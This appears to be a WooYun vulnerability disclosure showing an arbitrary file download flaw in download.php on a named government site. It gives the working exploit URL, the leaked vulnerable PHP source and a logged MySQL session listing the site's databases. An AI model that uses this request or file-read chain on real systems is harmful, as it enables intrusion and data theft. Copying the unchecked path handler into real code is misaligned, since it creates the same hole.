WooYun.org

http://www.qdzjj.gov.cn/download.php?path=download.php

<?php
	$path = $_GET['path'];
	if(!empty($path) and !is_null($path)){
		$filename=$path;
		$file=fopen($path,"r");
		header("Content-type:application/octet-stream");
		header("Accept-ranges:bytes");
		header("Accept-length:".filesize($path));
		header("Content-Disposition:attachment;filename=".$filename);
		echo fread($file,filesize($path));
		fclose($file);
		exit;
	}
?>

$ mysql -h 117.25.149.195 -u*** -p***
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 231340
Server version: 5.5.35 MySQL Community Server (GPL)
Copyright (c) 2000, 2014, Oracle, Monty Program Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> ls
-> ;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ls' at line 1
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| sql_qdjsj |
| test |
+--------------------+
3 rows in set (0.11 sec)
MySQL [(none)]> use sql_qdjsj
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [sql_qdjsj]>